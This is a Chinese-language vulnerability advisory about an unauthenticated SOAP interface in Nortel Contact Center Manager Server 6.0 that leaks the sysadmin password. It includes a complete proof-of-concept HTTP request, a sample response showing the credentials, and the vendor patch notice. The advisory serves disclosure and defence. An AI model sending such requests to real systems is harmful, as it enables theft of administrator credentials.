发布日期：2009-05-14
更新日期：2009-05-27

受影响系统：

Nortel Networks Contact Center Manager Server 6.0

描述：

---

BUGTRAQ  ID: 34964

Contact Center Manager Server（CCMS）是功能强大的呼叫中心解决方案。

CCMS提供了一个SOAP接口，该接口不需要授权，对某些请求可能会返回敏感信息。如果向sysadmin用户提交了以下SOAP请求：

---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction:
"http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SOAPWrapperCommon_UsersWS_GetServers_Wrapper
xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
      <ccmaUserName>string</ccmaUserName>
      <clientIP>string</clientIP>
      <componentID>string</componentID>
      <sessionID>string</sessionID>
      <strUserID>string</strUserID>
      <strPassword>string</strPassword>
    </SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
  </soap:Body>
</soap:Envelope>
---

就可能返回以下的响应，其中包含有sysadmin用户的口令：

---
&lt;rs:data&gt;
    &lt;z:row ID='0' ServerName='abcd01' ServerIP='10.1.2.3'
         ServerDescription='abcd01' ServerUserID='sysadmin'
ServerPassword='pwd4hugo'
         ServerType='1' SystemVersion='6.0' OpenQueue='0' HeteroNetworking='0'
         Network='0' ServerSWBuild='4.4F' ServerSULevel='CCMS_6.0_SU_05'
         ServerDPLevel='CCMS_6.0_SUS_0503' BasicIVR='1' GracePeriodState='3'
         RefreshIntervalsElapsed='0'/&gt;
&lt;/rs:data&gt;
---

<*来源：Bernhard Mueller （research@sec-consult.com）
  
  链接：http://marc.info/?l=bugtraq&m=124335568723386&w=2
        http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2009/19/024777-01.pdf
*>

建议：

---

厂商补丁：

Nortel Networks
---------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.nortel.com/

浏览次数：2656
严重程度：0（网友投票）